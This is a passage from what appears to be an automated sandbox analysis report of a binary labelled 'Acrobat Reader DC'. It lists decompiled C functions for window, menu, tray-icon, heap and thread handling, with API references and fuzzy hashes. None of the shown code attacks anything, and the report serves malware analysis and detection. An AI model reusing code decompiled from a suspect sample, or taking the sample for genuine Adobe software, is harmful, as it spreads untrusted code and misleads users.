                                  • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                  • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                  • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePost$KeyboardState$Parent
                                  • String ID:
                                  • API String ID: 87235514-0
                                  • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                  • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                  • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0044982A(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12) {
                                  				signed int _v8;
                                  				signed char _t40;
                                  				struct HWND__* _t42;
                                  				long _t49;
                                  				void* _t53;
                                  				struct HWND__** _t58;
                                  				intOrPtr _t63;
                                  				intOrPtr _t64;
                                  				intOrPtr _t72;
                                  				struct HWND__* _t75;
                                  				signed int _t79;
                                  				long _t80;
                                  
                                  				_t79 = _a8;
                                  				_a8 = 0;
                                  				if(E00441AF5(0x4a8630, _a4,  &_v8,  &_a4) != 0) {
                                  					_t63 =  *0x4a8690; // 0x0
                                  					_t64 =  *0x4a86a4; // 0xa51ad0
                                  					_v8 =  *((intOrPtr*)( *((intOrPtr*)(_t63 + _v8 * 4))));
                                  					_t58 =  *( *(_t64 + _a4 * 4));
                                  					_t75 =  *_t58;
                                  					if(_t79 == 0xffffffff) {
                                  						L14:
                                  						_t80 = _a12;
                                  						if(_t80 != 0xffffffff) {
                                  							_t49 = SetWindowLongW(_t75, 0xffffffec, _t80);
                                  							_t72 =  *0x4a86a4; // 0xa51ad0
                                  							_a8 = _t49;
                                  							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t72 + _a4 * 4)))) + 0x88)) == 0x13) {
                                  								_a8 = SendMessageW(_t75, 0x1036, 0, _t80);
                                  							}
                                  						}
                                  						_t40 = _t58[0x22];
                                  						if(_t40 == 0xff || (_t40 & 0x000000ff) ==  *((intOrPtr*)(_v8 + 0x194))) {
                                  							E00430B87(_v8, _t58, 1);
                                  						} else {
                                  							ShowWindow(_t75, 0);
                                  						}
                                  						_t42 = _t58[0x22];
                                  						if(_t42 == 2 || _t42 == 3 || _t80 != 0xffffffff) {
                                  							SetWindowPos( *_t58, 0, 0, 0, 0, 0, 0x27);
                                  						}
                                  						return 0 | _a8 != 0x00000000;
                                  					} else {
                                  						_t53 = (_t58[0x22] & 0x000000ff) + 0xfffffffe;
                                  						if(_t53 > 0x14) {
                                  							L13:
                                  							_a8 = SetWindowLongW(_t75, 0xfffffff0, _t79 | 0x50000000);
                                  							goto L14;
                                  						} else {
                                  							switch( *((intOrPtr*)(( *(_t53 + 0x4499c6) & 0x000000ff) * 4 +  &M004499AA))) {
                                  								case 0:
                                  									__esi = __esi | 0x00000004;
                                  									goto L9;
                                  								case 1:
                                  									L9:
                                  									_push(0);
                                  									if((__esi & 0x00000800) == 0) {
                                  										__esi = __esi | 0x00010000;
                                  										SendMessageW(__edi, 0xcf, 0, ??);
                                  									} else {
                                  										SendMessageW(__edi, 0xcf, 1, ??);
                                  									}
                                  									goto L13;
                                  								case 2:
                                  									__esi = __esi | 0x0000000e;
                                  									goto L13;
                                  								case 3:
                                  									__esi = __esi | 0x00000003;
                                  									goto L13;
                                  								case 4:
                                  									__esi = __esi | 0x04000000;
                                  									goto L13;
                                  								case 5:
                                  									return 0;
                                  									goto L26;
                                  								case 6:
                                  									goto L13;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  				L26:
                                  			}


                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                  • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                  • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440D98(signed int _a4, intOrPtr _a8) {
                                  				intOrPtr _t29;
                                  				long _t31;
                                  				intOrPtr _t32;
                                  				signed int _t34;
                                  				intOrPtr _t36;
                                  				intOrPtr _t41;
                                  				struct HWND__*** _t44;
                                  				struct HWND__*** _t48;
                                  				signed int _t54;
                                  				intOrPtr _t62;
                                  				intOrPtr _t64;
                                  				intOrPtr _t69;
                                  				signed int _t74;
                                  				signed int _t75;
                                  				void* _t76;
                                  				signed int _t77;
                                  				void* _t86;
                                  				void* _t90;
                                  
                                  				_t29 =  *0x4a86a4; // 0xa51ad0
                                  				_t74 = _a4;
                                  				_t77 = _t74;
                                  				_t31 = SendMessageW( *( *( *(_t29 + _t74 * 4))), 0xf0, 0, 0);
                                  				if(_t31 != 0 || _a8 != _t31) {
                                  					if(_t74 < 3) {
                                  						L8:
                                  						_t77 = _t77 + 1;
                                  					} else {
                                  						while(1) {
                                  							_t64 =  *0x4a86a4; // 0xa51ad0
                                  							_t48 =  *(_t64 + _t77 * 4);
                                  							if( *_t48 == 0 || ( *_t48)[0x22] != 0x1a) {
                                  								goto L8;
                                  							}
                                  							if((GetWindowLongW( *( *( *(_t64 + _t77 * 4))), 0xfffffff0) & 0x00020000) == 0) {
                                  								_t77 = _t77 - 1;
                                  								if(_t77 >= 3) {
                                  									continue;
                                  								} else {
                                  									goto L8;
                                  								}
                                  							}
                                  							goto L9;
                                  						}
                                  						goto L8;
                                  					}
                                  					L9:
                                  					_t75 = _t74 + 1;
                                  					_t86 = _t75 -  *0x4a86b4; // 0x2
                                  					if(_t86 <= 0) {
                                  						while(1) {
                                  							_t62 =  *0x4a86a4; // 0xa51ad0
                                  							_t44 =  *(_t62 + _t75 * 4);
                                  							if( *_t44 == 0 || ( *_t44)[0x22] != 0x1a || (GetWindowLongW( *( *( *(_t62 + _t75 * 4))), 0xfffffff0) & 0x00020000) != 0) {
                                  								goto L15;
                                  							}
                                  							_t75 = _t75 + 1;
                                  							_t90 = _t75 -  *0x4a86b4; // 0x2
                                  							if(_t90 <= 0) {
                                  								continue;
                                  							}
                                  							goto L15;
                                  						}
                                  					}
                                  					L15:
                                  					_t76 = _t75 - 1;
                                  					_t54 = _t77;
                                  					if(_t77 <= _t76) {
                                  						do {
                                  							_t41 =  *0x4a86a4; // 0xa51ad0
                                  							SendMessageW( *( *( *(_t41 + _t54 * 4))), 0xf1, 0, 0);
                                  							_t54 = _t54 + 1;
                                  						} while (_t54 <= _t76);
                                  					}
                                  					if(_a8 != 1) {
                                  						_t32 =  *0x4a86a4; // 0xa51ad0
                                  						_t34 = GetWindowLongW( *( *( *(_t32 + _t77 * 4))), 0xfffffff0);
                                  						_t36 =  *0x4a86a4; // 0xa51ad0
                                  						return SetWindowLongW( *( *( *(_t36 + _t77 * 4))), 0xfffffff0, _t34 | 0x00010000);
                                  					}
                                  					_t69 =  *0x4a86a4; // 0xa51ad0
                                  					return SendMessageW( *( *( *(_t69 + _a4 * 4))), 0xf1, 1, 0);
                                  				} else {
                                  					return _t31;
                                  				}
                                  			}


                                  APIs
                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                  • GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                  • SendMessageW.USER32(00A51AD0,000000F1,00000000,00000000), ref: 00440E6E
                                  • SendMessageW.USER32(00A51AD0,000000F1,00000001,00000000), ref: 00440E9A
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow
                                  • String ID:
                                  • API String ID: 312131281-0
                                  • Opcode ID: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction ID: 2c169baf4234265a3f6c05f50e500cf46f5ce099e15a3d3a23704bf731ec4cbe
                                  • Opcode Fuzzy Hash: 8e011b54ce9cde448a93fe9bb8036a6d541319eb6c66cabd8f3e8fc2f85cf438
                                  • Instruction Fuzzy Hash: 944189342402119FE720CF58DDC4F2A77A1FF9A710F6049A9E2119B3A1CB74ACA2CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448480(struct HWND__** _a4, signed int _a8, intOrPtr _a12, signed int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                  				struct tagMENUITEMINFOW _v56;
                                  				signed int _t48;
                                  				short* _t51;
                                  				struct HWND__** _t58;
                                  				intOrPtr _t60;
                                  				intOrPtr _t62;
                                  				intOrPtr _t68;
                                  				int _t75;
                                  				int _t76;
                                  				signed int _t77;
                                  
                                  				_t58 = _a4;
                                  				_t77 = _a8;
                                  				_t75 = _a16;
                                  				_v56.cbSize = 0x30;
                                  				E00412F40( &(_v56.fMask), 0, 0x2c);
                                  				if(_t75 != 0xffffffff) {
                                  					if(E00441AF5(0x4a8630, _t75,  &_a16,  &_a8) == 0) {
                                  						goto L16;
                                  					} else {
                                  						_t68 =  *0x4a8690; // 0x0
                                  						_t58 =  *( *(_t68 + _a16 * 4));
                                  						if(_t58[0x6a] == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t48 = _a8;
                                  							_t60 =  *0x4a86a4; // 0xa51ad0
                                  							 *(_t77 + 8) =  *( *((intOrPtr*)( *((intOrPtr*)(_t60 + _t48 * 4)))) + 8);
                                  							_t62 =  *0x4a86a4; // 0xa51ad0
                                  							if( *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t48 * 4)))) + 0x88)) != 0xe) {
                                  								L8:
                                  								if(IsMenu( *(_t77 + 8)) == 0) {
                                  									goto L16;
                                  								} else {
                                  									goto L9;
                                  								}
                                  							} else {
                                  								_v56.fMask = 4;
                                  								if(GetMenuItemInfoW( *(_t77 + 8), _t75, 0,  &_v56) == 0) {
                                  									goto L16;
                                  								} else {
                                  									 *(_t77 + 8) = _v56.hSubMenu;
                                  									goto L8;
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					if(_t58[0x6a] == 0) {
                                  						L16:
                                  						return 0;
                                  					} else {
                                  						 *(_t77 + 8) = _t58[0x68];
                                  						L9:
                                  						_v56.fMask = 0x13;
                                  						_v56.fType = 0;
                                  						if(_a28 == 1) {
                                  							_v56.fType = 0x200;
                                  						}
                                  						_t51 = _a20;
                                  						if( *_t51 == 0) {
                                  							_v56.fType = 0x800;
                                  						} else {
                                  							_v56.dwTypeData = _t51;
                                  						}
                                  						_t76 = _a24;
                                  						_v56.wID = _a12;
                                  						if(InsertMenuItemW( *(_t77 + 8), _t76, 1,  &_v56) == 0) {
                                  							goto L16;
                                  						} else {
                                  							 *(_t77 + 0x80) = _t76;
                                  							DrawMenuBar( *_t58);
                                  							return 1;
                                  						}
                                  					}
                                  				}
                                  			}


                                  APIs
                                  • _memset.LIBCMT ref: 004484A1
                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                  • IsMenu.USER32 ref: 0044854D
                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                  • DrawMenuBar.USER32 ref: 004485AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                  • String ID: 0
                                  • API String ID: 3866635326-4108050209
                                  • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                  • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                  • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E00401B80(void* __eax, void* __fp0) {
                                  				struct _NOTIFYICONDATAW _v940;
                                  				short _v942;
                                  				short _v1196;
                                  				char _v1212;
                                  				char _v1220;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t32;
                                  				void* _t57;
                                  				intOrPtr _t59;
                                  				intOrPtr _t61;
                                  				void* _t64;
                                  				intOrPtr _t65;
                                  				void* _t78;
                                  
                                  				_t78 = __fp0;
                                  				_t23 = __eax;
                                  				_t72 =  *0x4974ea;
                                  				_push(_t57);
                                  				if( *0x4974ea != 0) {
                                  					_t64 = __eax;
                                  					_t49 =  &_v1212;
                                  					E004013C0(0x104,  &_v1212, _t72);
                                  					if( *0x4974ec == 1) {
                                  						_t49 =  *0x497520;
                                  						LoadStringW( *0x497520, 0x65,  &_v1196, 0x7f);
                                  					} else {
                                  						_v1196 = 0;
                                  					}
                                  					E00402160( &_v1212,  &_v1196, 0, _t57);
                                  					if( *0x4974e9 != 0) {
                                  						_t59 =  *0x4a7f50; // 0x8dface
                                  						E0040D200( &_v1212, _t49, _t59, _t78);
                                  						_t65 =  *0x4a826c; // 0x9
                                  						_t32 = E004348DE(_t65);
                                  						__eflags = _t32;
                                  						if(_t32 == 0) {
                                  							goto L7;
                                  						} else {
                                  							E0040D200( &_v1212, _t49, L"\nLine: ", _t78);
                                  							_t61 = E004348DE(_t65);
                                  							goto L6;
                                  						}
                                  						L13:
                                  					} else {
                                  						if( *((intOrPtr*)(_t64 + 0x60)) != 0) {
                                  							E0040E0A0( &_v1212, _t64 + 0x5c);
                                  						} else {
                                  							_t61 =  *0x4a7f50; // 0x8dface
                                  							L6:
                                  							E0040D200( &_v1212, _t49, _t61, _t78);
                                  						}
                                  					}
                                  					L7:
                                  					E00412F40( &(_v940.hWnd), 0, 0x3a4);
                                  					_v940.cbSize = 0x3a8;
                                  					_v940.hWnd =  *0x497518;
                                  					_v940.uID = 1;
                                  					_v940.uFlags = 4;
                                  					E00412FBA( &_v1196, _v1212, 0x7f);
                                  					_v942 = 0;
                                  					E00411567( &(_v940.szTip),  &_v1196);
                                  					Shell_NotifyIconW(1,  &_v940);
                                  					_t23 = E00402250( &_v1220);
                                  				}
                                  				return _t23;
                                  				goto L13;
                                  			}



















                                  APIs
                                  • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _memset.LIBCMT ref: 00401C02
                                  • _wcsncpy.LIBCMT ref: 00401C41
                                  • _wcscpy.LIBCMT ref: 00401C5D
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy_wcslen_wcsncpy
                                  • String ID: Line:
                                  • API String ID: 1756504749-1585850449
                                  • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                  • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                  • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040F850(void* __eax, void* __ecx, void* __eflags) {
                                  				char _v8;
                                  				char _v16;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t11;
                                  				void* _t15;
                                  				void* _t18;
                                  				void* _t31;
                                  				void* _t32;
                                  				void* _t34;
                                  				unsigned int* _t35;
                                  				void* _t49;
                                  				void* _t50;
                                  				void* _t52;
                                  				void* _t53;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t57;
                                  				void* _t59;
                                  				void* _t64;
                                  				void* _t65;
                                  				void* _t66;
                                  				void* _t67;
                                  
                                  				_t38 = __ecx;
                                  				_t50 = __eax;
                                  				_t56 = __ecx;
                                  				_t11 = E00413530(__eax);
                                  				_t65 = _t64 + 4;
                                  				E0040F820(_t56);
                                  				E0040F880(_t11, _t38, _t56, _t50);
                                  				_t52 = _t49;
                                  				_t15 = _t56;
                                  				_t57 = _t55;
                                  				_t34 = _t32;
                                  				_t66 = _t65 - 0xc;
                                  				_push(_t34);
                                  				_push(_t57);
                                  				_push(_t52);
                                  				_t53 = _t15;
                                  				_t35 = _t53 + 0x44;
                                  				E0040F9D0(_t35,  &_v16, 8);
                                  				_t42 =  *_t35 >> 0x00000003 & 0x0000003f;
                                  				if(( *_t35 >> 0x00000003 & 0x0000003f) >= 0x38) {
                                  					_t18 = 0x78;
                                  				} else {
                                  					_t18 = 0x38;
                                  				}
                                  				E0040F880(_t18 - _t42, _t42, _t53, 0x4921a8);
                                  				E0040F880(8, _t42, _t53,  &_v16);
                                  				E0040F9D0(_t53 + 0x34, _t53, 0x10);
                                  				E00412F40(_t35, 0, 8);
                                  				E00412F40(_t53 + 0x34, 0, 0x10);
                                  				E00412F40(_t53 + 0x4c, 0, 0x40);
                                  				_t36 = _t53 + 0x10;
                                  				_t67 = _t66 + 0x24;
                                  				 *((char*)(_t53 + 0x10)) = 0;
                                  				_t59 = 0;
                                  				do {
                                  					E00414DB8( *(_t59 + _t53) & 0x000000ff,  &_v8, "%02X",  *(_t59 + _t53) & 0x000000ff);
                                  					_t31 = E00413660(_t36,  &_v8);
                                  					_t59 = _t59 + 1;
                                  					_t67 = _t67 + 0x14;
                                  				} while (_t59 < 0x10);
                                  				return _t31;
                                  			}



























                                  APIs
                                  • _strlen.LIBCMT ref: 0040F858
                                    • Part of subcall function 0040F820: _memset.LIBCMT ref: 0040F828
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                    • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                  • _memset.LIBCMT ref: 0040F973
                                  • _memset.LIBCMT ref: 0040F97D
                                  • _memset.LIBCMT ref: 0040F98A
                                  • _sprintf.LIBCMT ref: 0040F9AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memset$_memmove$_sprintf_strlen
                                  • String ID: %02X
                                  • API String ID: 1823384282-436463671
                                  • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                  • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                  • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E0041F6F9(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                  				void* _t6;
                                  				long _t7;
                                  				intOrPtr* _t8;
                                  				intOrPtr* _t12;
                                  				long _t27;
                                  				long _t30;
                                  
                                  				if(_a4 != 0) {
                                  					_push(__esi);
                                  					_t30 = _a8;
                                  					__eflags = _t30;
                                  					if(_t30 != 0) {
                                  						_push(__edi);
                                  						while(1) {
                                  							__eflags = _t30 - 0xffffffe0;
                                  							if(_t30 > 0xffffffe0) {
                                  								break;
                                  							}
                                  							__eflags = _t30;
                                  							if(_t30 == 0) {
                                  								_t30 = _t30 + 1;
                                  								__eflags = _t30;
                                  							}
                                  							_t6 = HeapReAlloc( *0x496e6c, 0, _a4, _t30);
                                  							_t27 = _t6;
                                  							__eflags = _t27;
                                  							if(_t27 != 0) {
                                  								L17:
                                  								_t7 = _t27;
                                  							} else {
                                  								__eflags =  *0x496e68 - _t6;
                                  								if(__eflags == 0) {
                                  									_t8 = E00417F77(__eflags);
                                  									 *_t8 = E00417F35(GetLastError());
                                  									goto L17;
                                  								} else {
                                  									__eflags = E00411988(_t30);
                                  									if(__eflags == 0) {
                                  										_t12 = E00417F77(__eflags);
                                  										 *_t12 = E00417F35(GetLastError());
                                  										L12:
                                  										_t7 = 0;
                                  										__eflags = 0;
                                  									} else {
                                  										continue;
                                  									}
                                  								}
                                  							}
                                  							goto L14;
                                  						}
                                  						E00411988(_t30);
                                  						 *((intOrPtr*)(E00417F77(__eflags))) = 0xc;
                                  						goto L12;
                                  					} else {
                                  						E00413748(_a4);
                                  						_t7 = 0;
                                  					}
                                  					L14:
                                  					return _t7;
                                  				} else {
                                  					return E004135BB(__edx, __edi, __esi, _a8);
                                  				}
                                  			}










                                  APIs
                                  • _malloc.LIBCMT ref: 0041F707
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _free.LIBCMT ref: 0041F71A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AllocateHeap_free_malloc
                                  • String ID: [B
                                  • API String ID: 1020059152-632041663
                                  • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                  • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                  • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00436C6E(void** _a4, intOrPtr* _a8, void** _a12) {
                                  				void* _t7;
                                  				void* _t11;
                                  				void* _t23;
                                  
                                  				_t23 = E00436B19();
                                  				_t7 = GetCurrentProcess();
                                  				DuplicateHandle(GetCurrentProcess(),  *_a4, _t7, _t23, 0, 0, 2);
                                  				_t2 = _t23 + 8; // 0x8
                                  				_t11 = GetCurrentProcess();
                                  				DuplicateHandle(GetCurrentProcess(),  *_a12, _t11, _t2, 0, 0, 2);
                                  				 *((intOrPtr*)(_t23 + 4)) =  *_a8;
                                  				return CreateThread(0, 0, E00436C2B, _t23, 0, 0);
                                  			}







                                  APIs
                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                  • CreateThread.KERNEL32 ref: 00436CCA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                  • String ID:
                                  • API String ID: 1957940570-0
                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E0043028B(signed int _a4, int _a8, signed int _a12) {
                                  				signed int _v12;
                                  				signed int _v16;
                                  				signed int _v20;
                                  				signed int _v24;
                                  				struct tagRECT _v40;
                                  				struct tagRECT _v56;
                                  				signed int _t161;
                                  				int _t182;
                                  				signed int _t217;
                                  				signed int _t218;
                                  				signed int _t219;
                                  				signed int _t221;
                                  				struct HWND__* _t223;
                                  				long _t225;
                                  				struct HWND__* _t226;
                                  				signed int _t228;
                                  				signed int _t243;
                                  				struct HWND__* _t244;
                                  				signed int _t251;
